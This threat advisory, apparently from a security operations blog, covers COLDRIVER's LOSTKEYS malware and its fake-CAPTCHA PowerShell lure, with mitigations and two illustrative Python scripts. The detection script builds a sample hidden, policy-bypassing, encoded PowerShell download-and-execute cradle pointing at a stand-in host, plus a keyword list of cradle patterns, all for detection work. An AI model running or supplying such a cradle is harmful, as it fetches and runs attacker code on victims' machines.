Threat Overview
The Security Operations Center (SOC) has reviewed a threat report published on AlienVault OTX on May 7, 2025; the underlying analysis is Google's and is linked in the references below. The report details the activities of COLDRIVER, a Russian government-backed threat group that has deployed new malware called LOSTKEYS. The malware is built to steal files and system information from high-profile targets, including Western governments and militaries, NGOs, journalists, and individuals connected to Ukraine.
Threat Actor Group: COLDRIVER
COLDRIVER is known for cyber operations aimed at collecting intelligence in support of Russia's strategic interests. The group has been linked to hack-and-leak campaigns against the UK and several NGOs. Its preferred targets are high-profile individuals, former intelligence and military officers, and organizations involved in activities related to Ukraine.
Threat Report Details
The threat report provides an in-depth analysis of COLDRIVER's latest malware, LOSTKEYS. The malware is delivered through a multi-step infection chain that begins with a fake CAPTCHA page: the "verification" it asks the victim to complete is to paste an attacker-supplied PowerShell command into the Windows Run dialog. The PowerShell stages that follow include checks intended to detect virtual machines (VMs), so that the payload is withheld from analysis sandboxes, and the final-stage payload is encoded with a substitution cipher that the malware decodes at runtime, which frustrates static signatures and slows analysis.
The malware's primary function is to steal documents and system information from compromised systems. COLDRIVER's usual route to initial access is credential phishing; LOSTKEYS is deployed selectively, against a subset of those targets, to exfiltrate files and host details that are then used for intelligence purposes.
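The following Python is an added illustration written for this post, not LOSTKEYS' code or anything from the report. It models a monoalphabetic substitution cipher used as a payload-encoding layer with a per-chain key, and shows two things the description above leaves implicit: the same payload encoded under two keys shares no byte-level signature, and an analyst who can guess a plaintext fragment can recover part of the key by aligning it (a known-plaintext attack). The alphabet, the key derivation, the seeds and the VBS-like PAYLOAD are all constructed assumptions for the example.

```python
"""Toy model of a substitution-cipher payload layer with a per-chain key.
Example code written for this post; it is not LOSTKEYS' implementation."""
import random
import string

# Alphabet the cipher permutes. Chosen for the example so that a VBS-like
# payload (letters, digits, punctuation, whitespace) round-trips.
ALPHABET = string.ascii_letters + string.digits + string.punctuation + " \r\n\t"

# Constructed stand-in for a final-stage script; not taken from any sample.
PAYLOAD = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\r\n'
    'WScript.Echo fso.GetDrive("C:").SerialNumber\r\n'
)


def make_key(seed):
    """Derive a per-chain key (a permutation of ALPHABET) from a seed.
    The seed stands in for whatever per-victim value a dropper would embed."""
    rng = random.Random(seed)
    chars = list(ALPHABET)
    rng.shuffle(chars)
    return "".join(chars)


def encode(plaintext, key):
    """Replace each plaintext character by the key character at the same index."""
    return plaintext.translate(str.maketrans(ALPHABET, key))


def decode(ciphertext, key):
    """Inverse of encode: the runtime decoding step a dropper performs."""
    return ciphertext.translate(str.maketrans(key, ALPHABET))


def recover_mapping(ciphertext, known_plaintext):
    """Known-plaintext attack: align a fragment believed to sit at the start of
    the payload and read off cipher->plain pairs. Returns the partial mapping,
    or None when the pairs contradict each other (wrong guess)."""
    forward, reverse = {}, {}
    for c, p in zip(ciphertext, known_plaintext):
        if forward.setdefault(c, p) != p or reverse.setdefault(p, c) != c:
            return None
    return forward


def partial_decode(ciphertext, mapping, unknown="?"):
    """Apply a partial mapping, marking characters whose plaintext is unknown."""
    return "".join(mapping.get(c, unknown) for c in ciphertext)


# Two infection chains carrying the same payload under different keys.
KEY_A = make_key("chain-A")
KEY_B = make_key("chain-B")
BLOB_A = encode(PAYLOAD, KEY_A)
BLOB_B = encode(PAYLOAD, KEY_B)


def signature_matches(blob_a, blob_b, length=16):
    """Does a byte signature taken from one blob's prefix hit the other blob?"""
    return blob_a[:length] in blob_b


if __name__ == "__main__":
    print("prefix signature from chain A hits chain B:",
          signature_matches(BLOB_A, BLOB_B))        # False: per-chain keys defeat it
    print("decodes with own key:", decode(BLOB_A, KEY_A) == PAYLOAD)
    print("decodes with other chain's key:", decode(BLOB_A, KEY_B) == PAYLOAD)
    guess = recover_mapping(BLOB_A, "Set fso = CreateObject(")
    print("partial plaintext from a guessed fragment:")
    print(partial_decode(BLOB_A, guess))
```

The practical consequence is the one the recommendations below rely on: because the encoded blob changes with every chain, detection has to key on the decoder's behaviour (the PowerShell stages, the script host it launches, the files it reads) or on the decoded content, not on bytes of the encoded payload.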
Impact on Targets
The targets of COLDRIVER's operations are diverse but strategically chosen. Western governments and militaries are primary targets because of the intelligence value of what they hold. Journalists, think tanks, NGOs and individuals connected to Ukraine are also targeted, presumably for information that can be used to shape public opinion or gain a strategic advantage.
Recommendations for Mitigation
To protect against COLDRIVER’s malware and other similar threats, organizations should implement the following recommendations:
- Enhance Phishing Awareness: Train staff to recognize credential phishing and, specifically, the fake-CAPTCHA lure, where a web page asks the user to "verify" by pasting a command into the Run dialog. No legitimate site requires that. Regular phishing simulations help keep this awareness current.
- Implement Multi-Factor Authentication (MFA): Require MFA for all accounts, especially those with access to sensitive information. Prefer phishing-resistant methods (FIDO2 security keys or passkeys), since COLDRIVER's credential phishing targets exactly the passwords that weaker factors sit behind.
- Monitor PowerShell Activity: Since COLDRIVER's infection chain runs through PowerShell, enable PowerShell Script Block Logging (Microsoft-Windows-PowerShell/Operational Event ID 4104) and process-creation auditing with command-line capture (Windows Event ID 4688 or Sysmon Event ID 1). Alert on PowerShell launched from explorer.exe with a hidden window, an encoded command, or a download-and-evaluate cradle, and restrict PowerShell on critical systems with Constrained Language Mode or application control where it is not needed.
- Use Endpoint Detection and Response (EDR): Deploy endpoint tooling that detects behaviour rather than only file hashes, because LOSTKEYS' encoded payload changes per infection chain. The behaviours to cover are PowerShell download cradles, script hosts reading many user documents, and unexpected outbound transfers.
- Regularly Update Security Software: Keep antivirus, anti-malware and EDR agents, and their signature and rule sets, up to date so that published indicators for this campaign are applied promptly.
- Conduct Regular Security Audits: Perform regular security audits to identify weaknesses in your network and endpoint configuration, and fix what you find promptly to reduce the chance of a successful intrusion.
- Implement Network Segmentation: Segment the network to limit the spread of malware and to make data exfiltration visible. Isolating critical systems and restricting their outbound access makes it harder for an attacker to move laterally or to ship stolen files out.
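The Python below is an added example, not part of the report or any vendor's tooling. It scores PowerShell process-creation events for the pasted-command pattern described above: PowerShell spawned by explorer.exe (the Run dialog), a hidden window, an execution-policy bypass, an -EncodedCommand blob (decoded from UTF-16LE base64 so the cradle inside can be inspected) and a download-and-evaluate cradle. The sample events, field names, weights and threshold are constructed assumptions for the example; a SIEM rule would read the same fields from Sysmon Event ID 1 or Windows Event ID 4688.

```python
"""Score PowerShell process-creation events for the fake-CAPTCHA / pasted-command
pattern. Hypothetical detection logic written for this post, not COLDRIVER's code
and not a vendor rule."""
import base64
import re

# Constructed sample events, shaped like Sysmon Event ID 1 / Windows 4688 fields.
# They are illustrative, not captured telemetry. The stage-1 cradle is built
# here so the encoded form is exact; example.invalid is a reserved test domain.
_STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
_ENCODED = base64.b64encode(_STAGE1.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # victim pastes the "verification" command into the Run dialog
        "parent": "explorer.exe",
        "image": "powershell.exe",
        "cmdline": f"powershell.exe -w hidden -ep bypass -ec {_ENCODED}",
    },
    {   # scheduled maintenance script: should not alert
        "parent": "svchost.exe",
        "image": "powershell.exe",
        "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    },
]

_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_CRADLE_RE = re.compile(
    r"DownloadString|Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b|FromBase64String",
    re.I,
)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE text),
    or None when the flag is absent or the blob does not decode."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return (score, reasons). Weights are illustrative tuning choices."""
    reasons = []
    cmd = event["cmdline"]
    if event["parent"].lower() == "explorer.exe":
        reasons.append(("parent explorer.exe (Run dialog / shell paste)", 2))
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
        reasons.append(("hidden window", 1))
    if re.search(r"-e(?:xecutionpolicy|p)\s+bypass", cmd, re.I):
        reasons.append(("execution policy bypass", 1))
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append(("encoded command", 1))
    # Inspect both the raw command line and the decoded script for a cradle.
    text = cmd + (" " + decoded if decoded else "")
    if _CRADLE_RE.search(text):
        reasons.append(("download/eval cradle", 2))
    return sum(w for _, w in reasons), reasons


def flagged_events(events, threshold=3):
    """Events whose score meets the alert threshold."""
    return [e for e in events if score_event(e)[0] >= threshold]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        score, reasons = score_event(e)
        print(f"{e['parent']} -> {e['image']}: score {score}")
        for text, weight in reasons:
            print(f"  +{weight} {text}")
        decoded = decode_encoded_command(e["cmdline"])
        if decoded:
            print(f"  decoded: {decoded}")
    print("flagged:", len(flagged_events(SAMPLE_EVENTS)))
```

The decode step matters more than the rest: an encoded command hides the cradle from any rule that only reads the raw command line, so the decoded text must be fed back into the same indicator checks. Script Block Logging (Event ID 4104) records the decoded script directly, which is the simpler source when it is enabled.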
Conclusion
The threat posed by COLDRIVER and its new malware, LOSTKEYS, is significant for the organizations it targets. Because the group reaches its victims through phishing and a social-engineering lure rather than an exploit, the defences above (phishing-resistant MFA, user awareness of the paste-a-command trick, and PowerShell logging with alerting) address the actual entry point. Organizations that apply them reduce both the chance of initial compromise and the time it takes to notice one.
For more detailed information on COLDRIVER and LOSTKEYS, refer to the external references provided:
- https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos
- https://otx.alienvault.com/pulse/681ba0e01c36344c7ac60892